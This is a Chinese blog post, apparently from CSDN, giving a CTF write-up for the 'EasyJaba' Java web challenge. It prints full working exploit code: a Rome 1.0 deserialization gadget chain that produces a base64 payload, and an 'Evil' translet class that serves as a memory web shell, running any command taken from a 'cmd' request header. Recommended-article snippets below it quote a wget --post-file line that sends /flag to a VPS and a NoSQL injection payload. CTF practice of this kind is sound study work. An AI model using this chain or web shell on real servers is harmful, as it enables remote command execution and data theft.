陇原战“疫“2021网络安全大赛 Web EasyJaba

最新推荐文章于 2024-04-02 09:35:35 发布
最新推荐文章于 2024-04-02 09:35:35 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: 陇原战疫2021复现 javaweb 文章标签: java CTF Web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RABCDXB/article/details/125576643
版权

陇原战"疫"2021网络安全大赛 Web EasyJaba

文章目录

查看源码,禁用了一些类

在这里插入图片描述

(这里说一下反编译工具的情况,之前我一直用的jd-gui,但是本题的附件,使用jd-gui,无法看到禁用的相关信息,如下;而上面的截图,是使用的是jdax1.4)

在这里插入图片描述

同时发现调用了rome1.0,所以就是用的rome1.0那条链了

在这里插入图片描述

HashMap类的作用是触发hashCode,而BadAttributeValueExpException类的作用是触发toString,看本题的源码,其中可以直接调用object.toString,就不需要入口类了

在这里插入图片描述

改写一下rome链

package Rome;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.sun.syndication.feed.impl.EqualsBean;
import com.sun.syndication.feed.impl.ObjectBean;
import com.sun.syndication.feed.impl.ToStringBean;

import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Base64;
import java.util.HashMap;


public class Rome2 {

    public static void unserialize(byte[] bytes) throws Exception{
        ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
        ObjectInputStream oin = new ObjectInputStream(bain);
        oin.readObject();
    }


    public static byte[] serialize(Object o) throws Exception{
        try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
            ObjectOutputStream oout = new ObjectOutputStream(baout)){
            oout.writeObject(o);
            return baout.toByteArray();
        }
    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
    public static void main(String[] args) throws Exception {
        //恶意字节码
        byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\cc1\\src\\main\\java\\Rome\\Evil.class"));
//        byte[] code = Files.readAllBytes(Paths.get("D:\\project\\java\\test\\target\\classes\\calc1.class"));
        TemplatesImpl templates = new TemplatesImpl();
        setFieldValue(templates,"_name","sk1y");  //不能设置为null,不然返回null
        setFieldValue(templates,"_class",null);
        setFieldValue(templates,"_bytecodes",new byte[][]{code});
        setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
        ToStringBean toStringBean = new ToStringBean(Templates.class,templates);
//        toStringBean.toString();
        byte[] aaa = serialize(toStringBean);
        System.out.println(Base64.getEncoder().encodeToString(aaa));
    }
}

在这里插入图片描述

不出网

因为本题不出网,所以使用的是网络上流传的spring不出网情况下加载的恶意类

package Rome;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.lang.reflect.Method;
import java.util.Scanner;

public class Evil extends AbstractTranslet
{
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {

    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {

    }
    public Evil() throws Exception{
        Class c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.RequestContextHolder");
        Method m = c.getMethod("getRequestAttributes");
        Object o = m.invoke(null);
        c = Thread.currentThread().getContextClassLoader().loadClass("org.springframework.web.context.request.ServletRequestAttributes");
        m = c.getMethod("getResponse");
        Method m1 = c.getMethod("getRequest");
        Object resp = m.invoke(o);
        Object req = m1.invoke(o); // HttpServletRequest
        Method getWriter = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.ServletResponse").getDeclaredMethod("getWriter");
        Method getHeader = Thread.currentThread().getContextClassLoader().loadClass("javax.servlet.http.HttpServletRequest").getDeclaredMethod("getHeader",String.class);
        getHeader.setAccessible(true);
        getWriter.setAccessible(true);
        Object writer = getWriter.invoke(resp);
        String cmd = (String)getHeader.invoke(req, "cmd");
        String[] commands = new String[3];
        String charsetName = System.getProperty("os.name").toLowerCase().contains("window") ? "GBK":"UTF-8";
        if (System.getProperty("os.name").toUpperCase().contains("WIN")) {
            commands[0] = "cmd";
            commands[1] = "/c";
        } else {
            commands[0] = "/bin/sh";
            commands[1] = "-c";
        }
        commands[2] = cmd;
        writer.getClass().getDeclaredMethod("println", String.class).invoke(writer, new Scanner(Runtime.getRuntime().exec(commands).getInputStream(),charsetName).useDelimiter("\\A").next());
        writer.getClass().getDeclaredMethod("flush").invoke(writer);
        writer.getClass().getDeclaredMethod("close").invoke(writer);
    }
}

javac进行编译为Evil.class,加载这个恶意class

最后的效果

在这里插入图片描述

看fmyyy师傅的wp,其实可以使用Hashtable替换HashMap,一样可以触发hashCode,原有的链子可以打通(我没成功,应该是哪点写的有问题),具体链接放下面了

参考链接

  1. java反序列化 rome链以及陇原战疫的java题
  2. 陇原战役2021 ezjaba_ByNotD0g的博客-CSDN博客
深育杯 2021 高校组 CTF 网络安全大赛 专业竞赛 真题 zip
12-07
深育杯 2021 高校组 CTF 网络安全大赛 专业竞赛 真题
2021第一届网刃杯网络安全大赛.zip
09-13
2021第一届网刃杯网络安全大赛.zip
陇原2021网络安全大赛 Web1
08-03
前言题挺有意思的,Web有点难,而且后面三道难题放的有点晚了,时间不够(肝了一下午的Java)。这个比赛的难度,能早9晚9的话可能还好一些,早9晚5就有点紧了。
陇原2021网络安全大赛的一道web
errorr0
04-30 383
复现以前打过的比赛题
陇原2021网络安全大赛_Crypto_复现
M3ng@L的博客
02-28 7029
陇原2021网络安全大赛_Crypto_复现mostlycommonDecryption codeDecryption~codeDecryption codeeasytaskDecryption codeDecryption~codeDecryption codePerferencePerferencePerferenceCivet cat for PrinceDescriptionDescriptionDescriptionAnalysisAnalysisAna
陇原2021网络安全大赛 Web MagicMail
Sk1y的博客
11-19 3431
知识点:本地起一个smtp服务,利用模板注入,找到可用的类 文章目录MagicMail注入点测试模板注入参考链接 MagicMail 注入点 这个题目很有意思,赛后根据官方wp进行复现 首先是,我们需要输入一个有smtp服务的ip和相应的端口,这个可以在自己的vps起一个smtp服务 python3 -m smtpd -c DebuggingServer -n 0.0.0.0:6667 输入自己的服务器ip和6667(ip和port根据自己的情况修改) 然后就是一个可以发送邮件的功能 在email的内
陇原2021网络安全大赛部分WP
七堇年的博客
12-24 2309
陇原""2021网络安全大赛WP
2021陇原
hezhing
12-08 337
2021陇原役 可惜只做了一个密码学。还是用软件直出的。我真垃圾。赛后复盘。 参考链接 2021陇原WP - n03tAck MISC soEasyCheckin 打开是一串加密。看编码是base32加密。解码发现是e开头,后面有5位的hex加密。但这里有个没解出来。根据前后可以推测为e。替换以后hex解密。 hex解密为社会主义核心价值观,但这里有个文明的文被替换掉了。这里换回去解密。 解密得到flag: SET{Qi2Xin1Xie2Li4-Long3Yuan2Zhan4Yi4} 打败
2021年“绿城杯”网络安全大赛
09-30
2021年“绿城杯”网络安全大赛是一场聚焦网络安全技术的竞技活动,旨在提升参赛者在信息安全领域的专业技能,增强社会对网络安全的重视。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛团队通过解决一系列...
陇原2021网络安全大赛 Web
feng的博客
11-08 5862
前言 题挺有意思的,Web有点难,而且后面三道难题放的有点晚了,时间不够(肝了一下午的Java)。这个比赛的难度,能早9晚9的话可能还好一些,早9晚5就有点紧了。 Java还是太菜了,需要学很多的东西。 eaaasyphp 反序列化链的构造很简单就不提了,正常构造写文件发现应该是不行的,目录应该不可写。给了个Hint类里面提示phpinfo,那打一下phpinfo看一下: class Bypass { public function __construct(){ $this->
陇原2021网络安全大赛Writeup
Le1a's Blog
11-08 6289
Web CheckIN 源代码的这两处: 先尝试访问/wget:/wget?argv=a,看出来这里应该是可以进行攻击的了 接着尝试利用wget的--post-file进行数据外带,读取源代码 在自己VPS开个监听并且构造: /wget?argv=a&argv=--post-file&argv=/flag&argv=http://1.14.92.24:8008/ 拿到flag: flag{6e6f4abf-f38c-4d30-8ccd-e0bc0012a13f} Misc
陇原""2021网络安全大赛writeup
渗透测试研究中心
12-22 5103
Web1.Checkin解题思路这道题 前面根据 源码应该是 nosql注入,我分析的payload:username='||1){returntrue;}})//&password=123456盲注得admin/54a83850073b0f4c6862d5a1d48ea84fimporttimeimportrequestsimportstringsession=reque...
陇原2021网络安全大赛 bbbaby和Magic
zylxixixi的博客
11-17 375
一、bbbaby 首先对程序进行分析 ,程序较为简单,提供了修改地址内容和输入任意大小内容的功能,存在栈溢出的可能。 因为事情多,就看了眼题,最开始我想使用利用栈溢出再使用chk_stack_fail泄露出libc版本信息,虽然成功打印出libc地址但是已经退出了程序。参考了大佬陇原2021网络安全大赛-pwn-wp - LynneHuan - 博客园 , 后面的思路为首先利用提供的修改地址内容的功能,将chk_stack_fail的got地址修改为puts的plt地址,然后通过栈溢出
陇原2021网络安全大赛 Re
PMR的博客
11-15 4452
1、 EasyRe IDA载入附件,搜索字符串得 flag: FLAG:flag{fc5e038d38a57032085441e7fe7010b0} 2、 findme 常规的流程,flag的加密和校验都在 off_403844: 跟进去发现 指向strcmp: 然后它又被 sub_401A0E 动过,向上回溯: 所以我们的目标是 sub_401866: 大概看了一下,确定是 RC4,整体还是挺干净的就一个库函数 strlen,当时是想偷懒,用以前的Unicorn脚本改了一下直接跑出来的:
陇原2021网络安全大赛 Web CheckIN
Sk1y的博客
12-24 3285
checkin 文章目录checkinwget外带数据分析官方wpnosql注入ssrf参考链接 参考链接:利用命令注入外带数据的一些姿势_一个安全研究员-CSDN博客_smb外带注入 题目有附件 下载,是个go语言,审计一下 ,文件目录如下 注意wget 还有 wget外带数据 根据上面的博客,可以执行命令wegt数据外带出来 wget?argv=1&argv=--post-file&argv=/flag&argv=http://vps:7777/ 然后既可以得到flag
陇原”EazyReWP
weixin_53622248的博客
11-08 201
陇原”EazyReWP 吐个槽: ​ 晚了半个小时左右开始打的比赛,eazyre已经被20多解出了,最后二百多解出,然后下午放了个只改了一个数据的EasyRE_Revenge,不到20解出,emmm,不想说啥。 进入IDA 发现读入input后进行了一个加密操作得到一个新的串和目标串比较,所以进入sub_311406查看。 sub311406 进行一次函数跳转后到了这个函数,发现栈帧有异常,看了半天也没看出来这是做了什么操作,但可以肯定的是一定通过这些奇怪操作让函数执行到了其他地方,于是这里我选
第四届江西省高校网络安全技能大赛初赛Web&Misc—Writeup
末初的CSDN博客
09-27 9333
文章目录WebEasyPHPfunny_gameadminloginSellSystemMisc Web EasyPHP funny_game 保存下载页面后,在index.js中发现一个win()函数 把内容拿出来放到控制台直接执行 var _0x46ec=['PD4d','w7Nbwoh1w6IWw6gMwovDr8OFTFHCq8OWwrLDrwQMwrnClEcbw5LCm2DCuEU1wopOw5HDlMOqw4MCcQMmWg=='];var _0x1409=function(_0
java集合解析(没学过也能理解)
weixin_51341922的博客
02-13 446
小白也能看懂的集合底层
探索未来编程的新星:Jaba - 简单、高效、可扩展的脚本语言
最新发布
gitblog_00046的博客
04-02 614
探索未来编程的新星:Jaba - 简单、高效、可扩展的脚本语言 去发现同类优质开源项目:https://gitcode.com/ 是一个新兴的开源脚本语言,旨在为开发者提供更简单、高效的编程体验,同时还具备强大的可扩展性。本文将深入探讨Jaba的技术特性,应用场景及其独特之处,希望吸引更多的开发者加入并使用这个项目。 项目简介 Jaba是由开发者Sweetiee-yi创建的一个轻量级脚本语言,其目...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值